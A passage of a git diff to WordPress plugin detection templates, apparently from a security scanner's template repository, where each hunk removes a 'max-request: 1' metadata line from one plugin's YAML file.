https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml 